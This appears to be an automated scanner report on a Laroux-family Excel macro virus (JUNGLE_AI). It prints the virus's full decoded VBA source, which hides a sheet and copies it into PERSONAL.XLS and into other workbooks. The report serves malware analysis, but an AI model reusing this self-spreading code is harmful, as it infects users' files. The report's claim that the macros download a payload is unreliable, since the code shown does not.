MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Xls.Trojan.Laroux-24. It contains VBA macros, including Auto_Open and Auto_Close, which are commonly used to execute malicious code upon document interaction. The macros appear to be designed to download and execute a secondary payload, although the exact mechanism is obfuscated and truncated in the provided script.
Heuristics 4
-
ClamAV: Xls.Trojan.Laroux-24 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Laroux-24
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7684 bytes |
SHA-256: f9db0067575db8af01c3849ad5021ec0468cd844d43e982c41124611b981cf14 |
|||
|
Detection
ClamAV:
Xls.Trojan.Laroux-24
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JUNGLE_AI"
'
Sub auto_open()
Attribute auto_open.VB_Description = "Macro recorded 09/02/1999 by pkgaim"
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n0"
I = Date
P$ = Str(I)
P1$ = Left(P$, 2)
If P1$ = "25" Then
'Kill "J*.*"
Else
End If
T = TimeValue(Time)
X$ = Str(T)
M$ = Left(X$, 2)
If M$ = "18" Or M$ = "6:" Or M$ = "06" Then
MsgBox ("VIRUS JUNGLE_AI")
Else
End If
End Sub
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Application.ScreenUpdating = False
H$ = ActiveWorkbook.Name
P$ = ActiveWorkbook.Path
S$ = Workbooks(H$).Sheets(1).Name
If S$ <> "JUNGLE_AI" Then
Workbooks("PERSONAL.XLS").Sheets("JUNGLE_AI").Copy BEFORE:=Workbooks(H$).Sheets(1)
Workbooks(H$).Sheets("JUNGLE_AI").Visible = False
Else
ST$ = Application.StartupPath
PE$ = Dir(ST$ & "\" & "PERSONAL.XLS")
If PE$ = "PERSONAL.XLS" Then
C = 1
Else
C = 0
End If
Application.ScreenUpdating = False
If C = 1 Then
N$ = ActiveWorkbook.Name
S$ = Workbooks("PERSONAL.XLS").Sheets(1).Name
If S$ <> "JUNGLE_AI" Then
'SAVE AS------
Windows("PERSONAL.XLS").Visible = True
Workbooks(N$).Sheets("JUNGLE_AI").Copy BEFORE:=Workbooks("PERSONAL.XLS").Sheets(1)
Windows("PERSONAL.XLS").Visible = False
'--------------
Else
End If
Else
'SAVE AS NEW------
Application.ScreenUpdating = False
N$ = ActiveWorkbook.Name
Sheets("JUNGLE_AI").Visible = True
Sheets("JUNGLE_AI").Select
CUR$ = CurDir()
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
N1$ = ActiveWorkbook.Name
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(N1$).SaveAs Filename:=Application.StartupPath & "\" & "PERSONAL.XLS", FileFormat:=xlNormal, _
Password:="", WriteResPassword:="", ReadOnlyRecommended:=False _
, CreateBackup:=False
ChDir CUR$
'--------------
End If
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "PERSONAL.XLS!JUNGLE_AI"
End Sub
' Processing file: /opt/analyzer/scan_staging/c037ec41e66c474aae12f6bee6d7ba3c.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/JUNGLE_AI - 5683 bytes
' Line #0:
' Line #1:
' QuoteRem 0x0000 0x0000 ""
' Line #2:
' FuncDefn (Sub auto_open())
' Line #3:
' Ld Date
' St I
' Line #4:
' Ld I
' ArgsLd Str 0x0001
' St P$
' Line #5:
' Ld P$
' LitDI2 0x0002
' ArgsLd LBound 0x0002
' St P1$
' Line #6:
' Ld P1$
' LitStr 0x0002 "25"
' Eq
' IfBlock
' Line #7:
' QuoteRem 0x0000 0x000B "Kill "J*.*""
' Line #8:
' ElseBlock
' Line #9:
' EndIfBlock
' Line #10:
' Ld Time
' ArgsLd TimeValue 0x0001
' St T
' Line #11:
' Ld T
' ArgsLd Str 0x0001
' St X$
' Line #12:
' Ld X$
' LitDI2 0x0002
' ArgsLd LBound 0x0002
' St M$
' Line #13:
' Ld M$
' LitStr 0x0002 "18"
' Eq
' Ld M$
' LitStr 0x0002 "6:"
' Eq
' Or
' Ld M$
' LitStr 0x0002 "06"
' Eq
' Or
' IfBlock
' Line #14:
' LitStr 0x000F "VIRUS JUNGLE_AI"
' Paren
' ArgsCall MsgBox 0x0001
' Line #15:
' ElseBlock
' Line #16:
' EndIfBlock
' Line #17:
' EndSub
' Line #18:
' Line #19:
' FuncDefn (Sub auto_close())
' Line #20:
' OnError (Resume Next)
' Line #21:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #22:
' Ld ActiveWorkbook
' MemLd New
' St H$
' Line #23:
' Ld ActiveWorkbook
' MemLd Path
' St P$
' Line #24:
' LitDI2 0x0001
' Ld H$
' ArgsLd Workbooks 0x0001
' ArgsMemLd Sheets 0x0001
' MemLd New
' St S$
' Line #25:
' Ld S$
' LitStr 0x0009 "JUNGLE_AI"
' Ne
' IfBlock
' Line #26:
' LitDI2 0x0001
' Ld H$
' ArgsLd Workbooks 0x0001
' ArgsMemLd Sheets 0x0001
' ParamNamed BEFORE
' LitStr 0x0009 "JUNGLE_AI"
' LitStr 0x000C "PERSONAL.XLS"
' ArgsLd Workbooks 0x0001
' ArgsMemLd Sheets 0x0001
' ArgsMemCall Copy 0x0001
' Line #27:
' LitVarSpecial (False)
' LitStr 0x0009 "JUNGLE_AI"
' Ld H$
' ArgsLd Wor
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.